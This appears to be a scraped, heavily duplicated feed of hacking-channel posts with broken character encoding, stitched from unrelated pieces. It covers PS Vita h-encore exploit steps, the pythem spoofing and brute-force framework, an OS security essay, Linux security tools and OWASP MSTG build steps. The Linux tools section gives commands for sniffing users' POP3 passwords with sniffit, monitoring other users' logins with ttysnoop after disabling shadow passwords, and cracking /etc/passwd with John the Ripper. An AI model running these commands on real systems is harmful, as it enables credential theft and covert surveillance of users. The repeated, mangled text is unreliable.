The h-encore bubble with a size of around 243 MB should now appear in the Content Manager and that's what you finally need to transfer to your PS Vita. If the size does not match or you get the error C2-12858-4, then it's because you did not do it correctly! Please re-read the instructions more carefully then. If you get the error You can only copy applications that your account is the owner of, then it's because you have used an AID that is not of your account, go back to step 8.
12) Launch h-encore to exploit your device (if a message about trophies appears, simply click yes). The screen should first flash white, then purple, and finally open a menu called h-encore bootstrap menu where you can download VitaShell and install HENkaku. If it prompts the error Cannot start this application. C0-11136-2, then it's because you did not do step 6. correctly.
> Note that you have to relaunch the exploit everytime you reboot or shutdown your device. Of course if you only put your device into standby mode, you don't need to relaunch.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
12) Launch h-encore to exploit your device (if a message about trophies appears, simply click yes). The screen should first flash white, then purple, and finally open a menu called h-encore bootstrap menu where you can download VitaShell and install HENkaku. If it prompts the error Cannot start this application. C0-11136-2, then it's because you did not do step 6. correctly.
> Note that you have to relaunch the exploit everytime you reboot or shutdown your device. Of course if you only put your device into standby mode, you don't need to relaunch.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated Penetration Testing Framework:
T.me/UnderCodeTesting
π¦Features :
1) RP spoofing - Man-in-the-middle.
2) ARP+DNS spoof - fake page redirect to credential harvester
3) DHCP ACK Injection spoofing - Man-in-the-middle
4) Man-in-the-middle inject BeEF hook
5) SSH Brute-Force attack.
6) Web page formulary brute-force
7) URL content buster
8) Overthrow the DNS of LAN range/IP address
9) Redirect all possible DNS queries to host
10) Get Shellcode from binary
11) Filter strings on pcap files
12) Exploit Development 1: Overwriting Instruction Pointer
13) Exploit Development 2: Ret2libc
π¦πβπππΈπππππΈπππβ & βπβ:
1) sudo apt-get update
2) sudo apt-get install -y build-essential python-dev python-pip tcpdump python-capstone \
3) libnetfilter-queue-dev libffi-dev libssl-dev
π¦ With pip:
> sudo pip install pythem
With source and pip:
1) git clone https://github.com/m4n3dw0lf/pythem
2) cd pythem
3) sudo python setup.py sdist
4) sudo pip install dist/*
π¦ Running
1) Call on a terminal (Requires root privileges):
$ sudo pythem
2) Running as Docker containeRequires Docker
docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated Penetration Testing Framework:
T.me/UnderCodeTesting
π¦Features :
1) RP spoofing - Man-in-the-middle.
2) ARP+DNS spoof - fake page redirect to credential harvester
3) DHCP ACK Injection spoofing - Man-in-the-middle
4) Man-in-the-middle inject BeEF hook
5) SSH Brute-Force attack.
6) Web page formulary brute-force
7) URL content buster
8) Overthrow the DNS of LAN range/IP address
9) Redirect all possible DNS queries to host
10) Get Shellcode from binary
11) Filter strings on pcap files
12) Exploit Development 1: Overwriting Instruction Pointer
13) Exploit Development 2: Ret2libc
π¦πβπππΈπππππΈπππβ & βπβ:
1) sudo apt-get update
2) sudo apt-get install -y build-essential python-dev python-pip tcpdump python-capstone \
3) libnetfilter-queue-dev libffi-dev libssl-dev
π¦ With pip:
> sudo pip install pythem
With source and pip:
1) git clone https://github.com/m4n3dw0lf/pythem
2) cd pythem
3) sudo python setup.py sdist
4) sudo pip install dist/*
π¦ Running
1) Call on a terminal (Requires root privileges):
$ sudo pythem
2) Running as Docker containeRequires Docker
docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to evaluate OS security full by UnderCode :
twitter.com/UndercOdeTC
π¦LETS START:
1) ---- With the development of the network, enterprises are connecting their local area network into a wide area network or their internal network into the Internet. This gives more and more people (internal and external) the opportunity to access internal network resources. As a result of this exposure, companies urgently need to address cybersecurity issues.
2) ---- A major part of providing effective security is assessing how well the existing security mechanisms are integrated with the company's network security policiesβthat is, determining whether the security policies are effectively implemented. The increasing complexity of the network makes it more and more difficult to implement security policies.
3) ---- Assessing the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: the firewall and the operating system (OS).
4) ---- Many companies focus their efforts on firewalls, and according to reports provided by the Aberdeen Group, the most vulnerable security holes are those that exist in the operating environment. Some vendors are committed to providing a reliable version of the operating environment, while most offer only optional, installable security services.
5) ---- The security mechanism of the operating system helps protect the machine running the OS from unauthorized access. Special protection is given to unauthorized access to specific information within the machine, specific machine instructions, and UNIX superuser instructions. Most firewalls and the Internet themselves are built on a standard, unsecured UNIX operating environment. This is why everyone is not surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors can lead to vulnerabilities.
π¦ The following two factors make the OS security mechanism very important:
1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system against such intruders.
2) Defense against intruders in the enterprise. Internal intruders are already inside the firewall, and FBI reports indicate that more than 60% of computer crimes originate from within the enterprise. In most cases, the offenders are those angry employees or contract contractors.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to evaluate OS security full by UnderCode :
twitter.com/UndercOdeTC
π¦LETS START:
1) ---- With the development of the network, enterprises are connecting their local area network into a wide area network or their internal network into the Internet. This gives more and more people (internal and external) the opportunity to access internal network resources. As a result of this exposure, companies urgently need to address cybersecurity issues.
2) ---- A major part of providing effective security is assessing how well the existing security mechanisms are integrated with the company's network security policiesβthat is, determining whether the security policies are effectively implemented. The increasing complexity of the network makes it more and more difficult to implement security policies.
3) ---- Assessing the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: the firewall and the operating system (OS).
4) ---- Many companies focus their efforts on firewalls, and according to reports provided by the Aberdeen Group, the most vulnerable security holes are those that exist in the operating environment. Some vendors are committed to providing a reliable version of the operating environment, while most offer only optional, installable security services.
5) ---- The security mechanism of the operating system helps protect the machine running the OS from unauthorized access. Special protection is given to unauthorized access to specific information within the machine, specific machine instructions, and UNIX superuser instructions. Most firewalls and the Internet themselves are built on a standard, unsecured UNIX operating environment. This is why everyone is not surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors can lead to vulnerabilities.
π¦ The following two factors make the OS security mechanism very important:
1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system against such intruders.
2) Defense against intruders in the enterprise. Internal intruders are already inside the firewall, and FBI reports indicate that more than 60% of computer crimes originate from within the enterprise. In most cases, the offenders are those angry employees or contract contractors.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:
instagram.com/UnderCodeTestingCompany
π¦LETS START:
1) setting up a UNIX system
2) Weaknesses brought by various versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)
3) Security Patches-The
operating system is constantly patching BUGS and adding features to complicate assessments, and these updates introduce new security vulnerabilities. What is needed is a way to automatically assess operating system vulnerabilities and automatically enforce security policies. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.
4) The OS security scan file provides exactly the required solution. Scanning software runs on each machine and probes each machine through a series of tests to unearth potential weaknesses. This software evaluates the stand-alone security environment from an operating system perspective and generates a detailed report of the vulnerabilities it finds and proposes solutions.
5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX, and AIX. It helps companies automate security assessments and maintenance on their operating system platforms. With this effective tool, companies can use the full potential of their networks to continuously increase their competitivenessβwithout having to worry about security.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:
instagram.com/UnderCodeTestingCompany
π¦LETS START:
1) setting up a UNIX system
2) Weaknesses brought by various versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)
3) Security Patches-The
operating system is constantly patching BUGS and adding features to complicate assessments, and these updates introduce new security vulnerabilities. What is needed is a way to automatically assess operating system vulnerabilities and automatically enforce security policies. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.
4) The OS security scan file provides exactly the required solution. Scanning software runs on each machine and probes each machine through a series of tests to unearth potential weaknesses. This software evaluates the stand-alone security environment from an operating system perspective and generates a detailed report of the vulnerabilities it finds and proposes solutions.
5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX, and AIX. It helps companies automate security assessments and maintenance on their operating system platforms. With this effective tool, companies can use the full potential of their networks to continuously increase their competitivenessβwithout having to worry about security.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Introduction to common Linux network security tools by UnderCode
pinterest.com/UnderCodeOfficial
π¦LETS START:
1) Although various versions of Linux distribution comes with a lot of free open-source software, but there are still a large number of useful tools are not default.
γγ
2) Included in their installation CDs are, in particular, some toolkits that can enhance Linux network security, and most of them are also open source free software.
π¦ Here is a brief introduction to several tools to enhance Linux network security.
1) sudo
γγ sudo is a program used by system administrators to allow some users to run some / all system commands as root. An obvious use is to enhance the security of the site. If you need to do some daily work as root every day and often execute some fixed commands that can only be executed by root, then sudo is very suitable for you.
sudo's homepage is at: http://www.courtesan.com/courtesan/products/sudo/
γγ
2) Take Redhat as an example, the following describes the installation and setup process:
γγ
3) First, you can download the rpm package for Redhat Linux from the sudo homepage.
It's at ftp://ftp.freshmeat.net/pub/rpms/sudo/ currently the latest stable version 1.5.9p4.
4) γExecute #rpm -ivh sudo * to install, then edit / etc / sudoers file with / usr / sbin / visudo.
5) If you are prompted that you cannot find / usr / bin / vi but you actually have the vi program in the directory / bin, you need
ln -sf / bin / vi / usr / bin / vi creates a symbolic link for vi under / usr / bin. (Note: I encountered this on Redhat 6.1, and this problem does not exist on Redhat 5.x)
γγ
6) In addition, if some other error occurs, you may also need #chmod 700 / var / run / sudo
π¦ Below is my / etc / sudoers Example file:
[root @ sh-proxy / etc] # more sudoers
Host_Alias ββSERVER = sh-proxy
# User alias specification
User_Alias ββADMIN = jephe, tome
# Cmnd alias specification
Cmnd_Alias ββSHUTDOWN = / etc / halt, / etc / shutdown, / etc / reboot
ADMIN SERVER = SHUTDOWN
jephe SERVER = / usr / bin / tail -f / var / log / maillog
jephe SERVER = / usr / bin / tail -f / var / log / messages
# User privilege specification
root ALL = (ALL) ALL
-----------
1) Since I often need to log in to the server remotely to observe the changes in the email log file / var / log / maillog, I added this line to / etc / sudoers so that I do nβt need to log in as root to complete my daily work and improve safety.
2) Sniffit Sniffit
γγis a well-known network port probe. You can configure it to run in the background to detect which TCP / IP ports the user's input / output information is on.
γ
3) The most commonly used function is that an attacker can use it to detect the data transfer on your 23 (telnet) and 110 (pop3) ports to easily get your login password and mail account password. Sniffit is basically used by the vandal. Tools, but if you want to know how to enhance the security of your site, you should first know the various tools used by intruders.
4) sniffit's homepage is at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html You can download the latest version from there. Installation is very easy, just run #tar xvfz sniff * solution in the root directory Open all files to the corresponding directory.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Introduction to common Linux network security tools by UnderCode
pinterest.com/UnderCodeOfficial
π¦LETS START:
1) Although various versions of Linux distribution comes with a lot of free open-source software, but there are still a large number of useful tools are not default.
γγ
2) Included in their installation CDs are, in particular, some toolkits that can enhance Linux network security, and most of them are also open source free software.
π¦ Here is a brief introduction to several tools to enhance Linux network security.
1) sudo
γγ sudo is a program used by system administrators to allow some users to run some / all system commands as root. An obvious use is to enhance the security of the site. If you need to do some daily work as root every day and often execute some fixed commands that can only be executed by root, then sudo is very suitable for you.
sudo's homepage is at: http://www.courtesan.com/courtesan/products/sudo/
γγ
2) Take Redhat as an example, the following describes the installation and setup process:
γγ
3) First, you can download the rpm package for Redhat Linux from the sudo homepage.
It's at ftp://ftp.freshmeat.net/pub/rpms/sudo/ currently the latest stable version 1.5.9p4.
4) γExecute #rpm -ivh sudo * to install, then edit / etc / sudoers file with / usr / sbin / visudo.
5) If you are prompted that you cannot find / usr / bin / vi but you actually have the vi program in the directory / bin, you need
ln -sf / bin / vi / usr / bin / vi creates a symbolic link for vi under / usr / bin. (Note: I encountered this on Redhat 6.1, and this problem does not exist on Redhat 5.x)
γγ
6) In addition, if some other error occurs, you may also need #chmod 700 / var / run / sudo
π¦ Below is my / etc / sudoers Example file:
[root @ sh-proxy / etc] # more sudoers
Host_Alias ββSERVER = sh-proxy
# User alias specification
User_Alias ββADMIN = jephe, tome
# Cmnd alias specification
Cmnd_Alias ββSHUTDOWN = / etc / halt, / etc / shutdown, / etc / reboot
ADMIN SERVER = SHUTDOWN
jephe SERVER = / usr / bin / tail -f / var / log / maillog
jephe SERVER = / usr / bin / tail -f / var / log / messages
# User privilege specification
root ALL = (ALL) ALL
-----------
1) Since I often need to log in to the server remotely to observe the changes in the email log file / var / log / maillog, I added this line to / etc / sudoers so that I do nβt need to log in as root to complete my daily work and improve safety.
2) Sniffit Sniffit
γγis a well-known network port probe. You can configure it to run in the background to detect which TCP / IP ports the user's input / output information is on.
γ
3) The most commonly used function is that an attacker can use it to detect the data transfer on your 23 (telnet) and 110 (pop3) ports to easily get your login password and mail account password. Sniffit is basically used by the vandal. Tools, but if you want to know how to enhance the security of your site, you should first know the various tools used by intruders.
4) sniffit's homepage is at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html You can download the latest version from there. Installation is very easy, just run #tar xvfz sniff * solution in the root directory Open all files to the corresponding directory.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Linux Network-Tools PART 2 :
> You can run sniffit -i with an interactive graphical interface to view all input / output information on the specified network interface:
π¦LETS START:
1) For example: In order to get the pop3 account and password that all users enter when receiving mail through an interface abcd, you can run
#sniffit -p 110 -t abcd &
#sniffit -p 110 -s abcd &
log files in the directory / usr / doc / sniffit * below:
2) The log file is named according to the visitor's IP address, a random high-end port number, and the network interface IP address and detection port used for detection. It takes advantage of the inherent weakness of the TCP / IP protocol, because the username and password information transmitted by ordinary telnet and pop3 are in plain text, without any encryption. So for telnet / ftp. You can use ssh / scp instead. The ssh / scp information detected by sniffit is basically a bunch of garbled characters, so you don't need to worry about the username and password information transmitted by ssh being stolen by a third party.
3) ttysnoop (s)
ttysnoop is a program that redirects all input / output to one terminal number to another terminal. At present, the website I know of is http://uscan.cjb.net , but I can't connect to it all the time. I got ttysnoop-0.12c-5 from other channels, and the address is http://rpmfind.net/linux /RPM/contrib/libc6/i386/ttysnoop-0.12c-5.i386.html This version does not seem to support shadow password. After installation, you need to manually create the directory / var / spool / ttysnoop to test this program is interesting, below Related instructions:
4) First change the in.telnetd in /etc/inetd.conf to call the login login program to / sbin / ttysnoops by default, as follows:
[root @ jephe / etc] # more inetd.conf | grep in.telnetd
telnet stream tcp nowait root / usr / sbin / tcpd in.telnetd -L / sbin / ttysnoops
5) Be sure to run killall -HUP inetd after the change to make it effective, make sure not to use shadow passwords, use #pwunconv to disable shadow passwords.
Then edit the file / etc / snooptab to configure the default configuration.
[root @ jephe / etc] # more snooptab
ttyS1 / dev / tty7 login / bin / login
ttyS2 / dev / tty8 login / bin / login
* socket login / bin / login
------
6) Finally, if in a terminal Someone logged in (you can use the w command to see which terminal it is on), if the terminal device is ttyp0, you can log in to the server and type # / bin / ttysnoop ttyp0 (prompt for the root password, again, the above mentioned This version does not support shadow passwords) to monitor user login windows.
π¦ nmap
nmap is a tool used to perform port scanning on a relatively large network. It can detect which TCP / IP ports are currently open on the server. You can run it to ensure that unsafe port numbers that should not be opened are blocked.
nmap's homepage gives a simple example at http://www.insecure.org/nmap/index.html
[root @ sh-proxy / etc] # / usr / local / bin / nmap public.sta.net .cn
1) Starting nmap V. 2.12 by Fyodor ( fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
109 open tcp pop-2
110 open tcp pop-3
143 open tcp imap2
513 open tcp login
514 open tcp shell
7000 open tcp afs3-fileserver
2) Nmap run completed-1 IP address (1 host up) scanned in 15 seconds
π¦ John the ripper
1) In Linux, the password is hashed The format is stored. You cannot analyze the password from the hash data table in the reverse direction, but you can compare it with a set of word hash, and guess the password if the same. Therefore, it is critical to have a password that is difficult to guess. In general you must not use a word in a dictionary as a password, it is quite easy to guess. In addition, some common regular alphanumeric arrangements cannot be used as the password, such as 123abc.
π¦ Linux Network-Tools PART 2 :
> You can run sniffit -i with an interactive graphical interface to view all input / output information on the specified network interface:
π¦LETS START:
1) For example: In order to get the pop3 account and password that all users enter when receiving mail through an interface abcd, you can run
#sniffit -p 110 -t abcd &
#sniffit -p 110 -s abcd &
log files in the directory / usr / doc / sniffit * below:
2) The log file is named according to the visitor's IP address, a random high-end port number, and the network interface IP address and detection port used for detection. It takes advantage of the inherent weakness of the TCP / IP protocol, because the username and password information transmitted by ordinary telnet and pop3 are in plain text, without any encryption. So for telnet / ftp. You can use ssh / scp instead. The ssh / scp information detected by sniffit is basically a bunch of garbled characters, so you don't need to worry about the username and password information transmitted by ssh being stolen by a third party.
3) ttysnoop (s)
ttysnoop is a program that redirects all input / output to one terminal number to another terminal. At present, the website I know of is http://uscan.cjb.net , but I can't connect to it all the time. I got ttysnoop-0.12c-5 from other channels, and the address is http://rpmfind.net/linux /RPM/contrib/libc6/i386/ttysnoop-0.12c-5.i386.html This version does not seem to support shadow password. After installation, you need to manually create the directory / var / spool / ttysnoop to test this program is interesting, below Related instructions:
4) First change the in.telnetd in /etc/inetd.conf to call the login login program to / sbin / ttysnoops by default, as follows:
[root @ jephe / etc] # more inetd.conf | grep in.telnetd
telnet stream tcp nowait root / usr / sbin / tcpd in.telnetd -L / sbin / ttysnoops
5) Be sure to run killall -HUP inetd after the change to make it effective, make sure not to use shadow passwords, use #pwunconv to disable shadow passwords.
Then edit the file / etc / snooptab to configure the default configuration.
[root @ jephe / etc] # more snooptab
ttyS1 / dev / tty7 login / bin / login
ttyS2 / dev / tty8 login / bin / login
* socket login / bin / login
------
6) Finally, if in a terminal Someone logged in (you can use the w command to see which terminal it is on), if the terminal device is ttyp0, you can log in to the server and type # / bin / ttysnoop ttyp0 (prompt for the root password, again, the above mentioned This version does not support shadow passwords) to monitor user login windows.
π¦ nmap
nmap is a tool used to perform port scanning on a relatively large network. It can detect which TCP / IP ports are currently open on the server. You can run it to ensure that unsafe port numbers that should not be opened are blocked.
nmap's homepage gives a simple example at http://www.insecure.org/nmap/index.html
[root @ sh-proxy / etc] # / usr / local / bin / nmap public.sta.net .cn
1) Starting nmap V. 2.12 by Fyodor ( fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
109 open tcp pop-2
110 open tcp pop-3
143 open tcp imap2
513 open tcp login
514 open tcp shell
7000 open tcp afs3-fileserver
2) Nmap run completed-1 IP address (1 host up) scanned in 15 seconds
π¦ John the ripper
1) In Linux, the password is hashed The format is stored. You cannot analyze the password from the hash data table in the reverse direction, but you can compare it with a set of word hash, and guess the password if the same. Therefore, it is critical to have a password that is difficult to guess. In general you must not use a word in a dictionary as a password, it is quite easy to guess. In addition, some common regular alphanumeric arrangements cannot be used as the password, such as 123abc.
nmap.org
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
3) John the ripper is an efficient and easy-to-use password guessing program.http://www.openwall.com/john/
Download the tar.gz format program for UNIX, and then use tar xvfz john * .tar.gz to extract it to any directory. After entering the src directory and typing make linux-x86-any-elf (I use redhat 6.1), several execution files will be generated in the run directory, including the main program john. Now run Crack./john / etc / passwd for the Crack password.
> John can also crack the password generated by htpasswd to verify the apache user password. If you create a user user with htpasswd -c apachepasswd user and generate a password, you can also use john apachepasswd to guess. John outputs it to the terminal when guessing the password, and stores the guessed password in the john.pot file.
π¦ Another password cracker is the classic Cracker that everyone knows. The homepage is at http://www.users.dircon.co.uk/~crypto/II .
1) Logcheck
Logcheck is used to automatically check the system security intrusion events and abnormal activity records. Tool, which analyzes various Linux log files,
such as / var / log / messages, / var / log / secure, / var / log / maillog, etc., and then generates a problem report that may have security issues and automatically sends email to the administrator . You can set it to run on an hourly, or daily basis with crond.
2) The homepage of the logcheck tool is at http://www.psionic.com/abacus/logcheck/After downloading, use tar xvfz logcheck * to extract to a temporary directory such as / tmp, and then use ./make linux to automatically generate the corresponding files to / usr / local / etc, / usr / local / bin / and other directories. Change settings such as who can send email notifications to the root account by default. You can set root's email alias account to a group of people. Change the settings to ignore certain types of messages such as plug-gw in your mail log file. Because plug-gw does a reverse IP lookup, if it can't find it, it will log a warning message to / var / log / maillog. Logcheck logs all these warnings to you by default. You can ignore them by setting.
3) Using the logcheck tool to analyze all your logfiles avoids you having to manually check them daily, saving time and improving efficiency.
4) Three. Tripwire
Tripwire is a very useful tool for verifying file integrity. You can define which files / directories need to be checked, but the default settings can meet most requirements. It runs in four modes: database generation mode , Database update mode, file integrity check, interactive database update. When the initialization database is generated, it generates a database file of various information on existing files. In case your system files or various configuration files are accidentally changed, replaced, or deleted, it will be based on the original database every day. Compare the existing files to find out which files have been changed. You can judge whether there are any unexpected events such as system intrusion based on the results of email.
5) Tripwire's homepage is at http://www.tripwiresecurity.com , and you can use tripwire-1.2.3 for free. If you use Redhat Linux 6.1, you can also get the latest Tripwire-1.2.3 rebuilt for 6.1
(http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html ) When you manually change the configuration file or program in the system, you can manually generate it again
6) Database files, run tripwire-initialize to create the databases directory under the current directory and generate a new system database file under this directory, then cp to the / var / spool / tripwire directory to overwrite the old one.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Download the tar.gz format program for UNIX, and then use tar xvfz john * .tar.gz to extract it to any directory. After entering the src directory and typing make linux-x86-any-elf (I use redhat 6.1), several execution files will be generated in the run directory, including the main program john. Now run Crack./john / etc / passwd for the Crack password.
> John can also crack the password generated by htpasswd to verify the apache user password. If you create a user user with htpasswd -c apachepasswd user and generate a password, you can also use john apachepasswd to guess. John outputs it to the terminal when guessing the password, and stores the guessed password in the john.pot file.
π¦ Another password cracker is the classic Cracker that everyone knows. The homepage is at http://www.users.dircon.co.uk/~crypto/II .
1) Logcheck
Logcheck is used to automatically check the system security intrusion events and abnormal activity records. Tool, which analyzes various Linux log files,
such as / var / log / messages, / var / log / secure, / var / log / maillog, etc., and then generates a problem report that may have security issues and automatically sends email to the administrator . You can set it to run on an hourly, or daily basis with crond.
2) The homepage of the logcheck tool is at http://www.psionic.com/abacus/logcheck/After downloading, use tar xvfz logcheck * to extract to a temporary directory such as / tmp, and then use ./make linux to automatically generate the corresponding files to / usr / local / etc, / usr / local / bin / and other directories. Change settings such as who can send email notifications to the root account by default. You can set root's email alias account to a group of people. Change the settings to ignore certain types of messages such as plug-gw in your mail log file. Because plug-gw does a reverse IP lookup, if it can't find it, it will log a warning message to / var / log / maillog. Logcheck logs all these warnings to you by default. You can ignore them by setting.
3) Using the logcheck tool to analyze all your logfiles avoids you having to manually check them daily, saving time and improving efficiency.
4) Three. Tripwire
Tripwire is a very useful tool for verifying file integrity. You can define which files / directories need to be checked, but the default settings can meet most requirements. It runs in four modes: database generation mode , Database update mode, file integrity check, interactive database update. When the initialization database is generated, it generates a database file of various information on existing files. In case your system files or various configuration files are accidentally changed, replaced, or deleted, it will be based on the original database every day. Compare the existing files to find out which files have been changed. You can judge whether there are any unexpected events such as system intrusion based on the results of email.
5) Tripwire's homepage is at http://www.tripwiresecurity.com , and you can use tripwire-1.2.3 for free. If you use Redhat Linux 6.1, you can also get the latest Tripwire-1.2.3 rebuilt for 6.1
(http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html ) When you manually change the configuration file or program in the system, you can manually generate it again
6) Database files, run tripwire-initialize to create the databases directory under the current directory and generate a new system database file under this directory, then cp to the / var / spool / tripwire directory to overwrite the old one.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Openwall
John the Ripper password cracker
A fast password cracker for Unix, macOS, Windows, DOS, BeOS, and OpenVMS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security development, testing and reverse engineering :
T.me/UnderCodeTesting
π¦LETS START:
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./generate_document.sh
4) Clone the repository and run the gitbook generator.
π¦ This produces PDF, Epub and Mobi files in the "Generated" subdirectory.
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./gitbookandpdf.sh
check more on same git link
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security development, testing and reverse engineering :
T.me/UnderCodeTesting
π¦LETS START:
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./generate_document.sh
4) Clone the repository and run the gitbook generator.
π¦ This produces PDF, Epub and Mobi files in the "Generated" subdirectory.
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./gitbookandpdf.sh
check more on same git link
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β